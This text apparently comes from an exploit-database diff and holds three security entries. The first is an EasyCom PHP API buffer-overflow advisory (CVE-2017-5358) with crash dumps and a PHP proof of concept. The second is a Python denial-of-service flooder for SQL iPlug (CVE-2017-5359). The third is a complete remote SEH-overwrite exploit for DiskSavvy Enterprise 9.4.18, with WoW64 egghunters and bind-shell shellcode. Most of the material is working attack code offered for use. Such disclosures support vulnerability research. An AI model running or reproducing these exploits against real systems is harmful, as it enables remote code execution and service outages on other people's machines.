 PHP 5.3.1 (cli) (built: Nov 20 2009 17:26:32)
 Copyright (c) 1997-2009 The PHP Group
 Zend Engine v2.3.0
 PHP compiled module API=20090626 (need to use for EasyCom IBM DLL)
 Vulnerability Type:
 =========================
 API Stack Buffer Overflow
 CVE Reference:
 ==============
 CVE-2017-5358
 Security Issue:
 ================
 EasyCom PHP API suffers from multiple Buffer Overflow entry points, which can result in arbitrary code execution on affected system.
 Below I provide some proof of concept details for a few of them.
 EAX 00000000
 ECX 41414141
 EDX 771D6ACD ntdll.771D6ACD
 EBX 00000000
 ESP 00C0F238
 EBP 00C0F258
 ESI 00000000
 EDI 00000000
 EIP 41414141
 C 0  ES 002B 32bit 0(FFFFFFFF)
 P 1  CS 0023 32bit 0(FFFFFFFF)
 A 0  SS 002B 32bit 0(FFFFFFFF)
 Z 1  DS 002B 32bit 0(FFFFFFFF)
 S 0  FS 0053 32bit 7EFDD000(FFF)
 T 0  GS 002B 32bit 0(FFFFFFFF)
 D 0
 O 0  LastErr ERROR_SUCCESS (00000000)
 EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
 SEH chain of main thread
 Address    SE handler
 00C0F354   kernel32.7600410E
 00C0FF78   42424242
 52525252   *** CORRUPT ENTRY ***
 WinDbg dump...
 (720.a70): Access violation - code c0000005 (first/second chance not available)
 *** ERROR: Symbol file could not be found.  Defaulted to export symbols for ntdll.dll - 
 eax=00000000 ebx=00000000 ecx=41414141 edx=77316acd esi=00000000 edi=00000000
 eip=41414141 esp=004111e8 ebp=00411208 iopl=0         nv up ei pl zr na pe nc
 cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
 41414141 ??              ???
 0:000> !load winext/msec
 0:000> !exploitable
 !exploitable 1.6.0.0
 Exploitability Classification: EXPLOITABLE
 Recommended Bug Title: Exploitable - Data Execution Prevention Violation starting at Unknown Symbol @ 0x0000000041414141
 called from ntdll!RtlDosSearchPath_Ustr+0x0000000000000ada (Hash=0x05cdf8a7.0xce7d7411)
 User mode DEP access violations are exploitable.
 PHP Crash:
 =============
 Problem signature:
  Problem Event Name:	BEX
  Application Name:	php.exe
  Application Version:	5.3.1.0
  Application Timestamp:	4b06c430
  Fault Module Name:	StackHash_e98d
  Fault Module Version:	0.0.0.0
  Fault Module Timestamp:	00000000
  Exception Offset:	41414141
  Exception Code:	c0000005
  Exception Data:	00000008
  OS Version:	6.1.7601.2.1.0.256.48
 Exploit/POC:
 ===============
 php_Easycom5_3_0.dll 0day vuln POC minus the exploit, I'm bored goin to the park.
 <?php
 /* Basic connection to an AS400 iBMI System  */
 $payload=str_repeat("A", 4000);                                          #BOOM!
 $payload=str_repeat("A",1868)."RRRRBBBB".str_repeat("\x90",100);         #SEH
 $conn = i5_connect($payload, "QPGMR", "PASSW") or die(i5_errormsg());    #VULN 
 $conn = i5_pconnect($payload, 'QSECOFR', 'password', array() );          #VULN 
 $conn = i5_private_connect($payload, $user, $password, array());         #VULN 
 echo 'EasyCom PHP API 0day ' . $conn;
 ?>
 Network Access:
 ===============
 Remote
 Severity:
 ==========
 High
 Disclosure Timeline:
 ======================================
 Vendor Notification: December 22, 2016
 Vendor acknowledgement: December 23, 2016
 Vendor Release Fix/Version February 20, 2017
 February 22, 2017 : Public Disclosure
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. 
--- a/platforms/windows/dos/41426.txt
+++ b/platforms/windows/dos/41426.txt
@ -0,0 +1,99 @@
 [+] Credits: John Page AKA Hyp3rlinX	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/EASYCOM-SQL-IPLUG-DENIAL-OF-SERVICE.txt
 [+] ISR: ApparitionSec
 Vendor:
 ================
 easycom-aura.com
 Product:
 ===========
 SQL iPlug
 EasycomPHP_4.0029.iC8im2.exe
 SQL iPlug provides System i applications real-time access to heterogeneous and external databases
 (Oracle, SQL Server, MySQL, MS Access, Sybase, Progress) in a completely transparent manner and without requiring replication.
 Vulnerability Type:
 ===================
 Denial Of Service
 CVE Reference:
 ==============
 CVE-2017-5359
 Security Issue:
 ================
 SQL iPlug listens on port 7078 by default, it suffers from denial of service when sending overly long string via
 HTTP requests fed to the "D$EVAL" parameter.
 Exploit/POC:
 ============
 import socket
 print 'EasyCom SQL-IPLUG DOS 0day!'
 print 'hyp3rlinx'
 IP = raw_input("[IP]> ")
 PORT = 7078 
 payload="A"*43000
 arr=[]
 c=0
 while 1:
    try:
        arr.append(socket.create_connection((IP,PORT)))
        arr[c].send('GET /?D$EVAL='+payload+" HTTP/1.1\r\n\r\n")
        c+=1
        print "doit!"
    except socket.error:
        print "[*] 5th ave 12:00"
        raw_input()
        break
 Disclosure Timeline:
 ======================================
 Vendor Notification: December 22, 2016
 Vendor acknowledgement: December 23, 2016
 Vendor Release Fix/Version February 20, 2017
 February 22, 2017 : Public Disclosure
 Network Access:
 ===============
 Remote
 Severity:
 ===========
 Medium
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. 
--- a/platforms/windows/remote/41436.py
+++ b/platforms/windows/remote/41436.py
@ -0,0 +1,98 @@
 # Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters 
 # Date: 2017-02-22
 # Exploit Author: Peter Baris
 # Vendor Homepage: www.saptech-erp.com.au
 # Software Link: http://www.disksavvy.com/downloads.html
 # Version: 9.4.18
 # Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
 # WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
 # Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
 # Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
 # If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
 import socket
 import sys
 try:
    host = sys.argv[1]
    os = sys.argv[2]
    port = 80
 except IndexError:
    print "[+] Usage %s <host>  win7/win10" % sys.argv[0]
    print "[i] Example: dsavvy.py localhost win10"
    sys.exit()
 # 355 bytes bind shell, PORT 4444,  bad chars \x09\x0a\x0d\x20
 shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
 "\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
 "\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
 "\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
 "\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
 "\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
 "\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
 "\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
 "\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
 "\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
 "\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
 "\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
 "\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
 "\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
 "\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
 "\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
 "\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
 "\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
 "\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
 "\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
 "\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
 "\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
 "\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
 "\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
 crash = "\x41" * 2487
 retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
 filler = "\x44" * (2505-334-300-100)
 nseh = "\xeb\x08\x90\x90"
 stack_fill="\x41"*100
 nops="\x90"*8
 egg = "t00wt00w"
 if os == "win7":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
 "\x33\xd2" 
 "\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
 "\x2e\x5a\x3c\x05\x74\xef\xb8" 
 "\x74\x30\x30\x77"
 "\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
 "\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
 elif os == "win10":
  wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
 "\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
 "\x74\x30\x30\x77"
 "\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
 "\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
 else:
  print "[!] This windows version is not supported yet"
  exit(0)
 exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops  + shell + filler
 buffer = "GET /"+exploit+" HTTP/1.1\r\n"
 buffer+= "Host: "+host+"\r\n"
 buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
 buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 buffer+="Accept-Language: en-US,en;q=0.5\r\n"
 buffer+="Accept-Encoding: gzip, deflate\r\n"
 buffer+="Referer: http://"+host+"/login\r\n"
 buffer+="Connection: keep-alive\r\n"
 buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
 buffer+="Content-Length: 5900\r\n\r\n"
 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 connect=s.connect((host,port))
 s.send(buffer)
 s.close()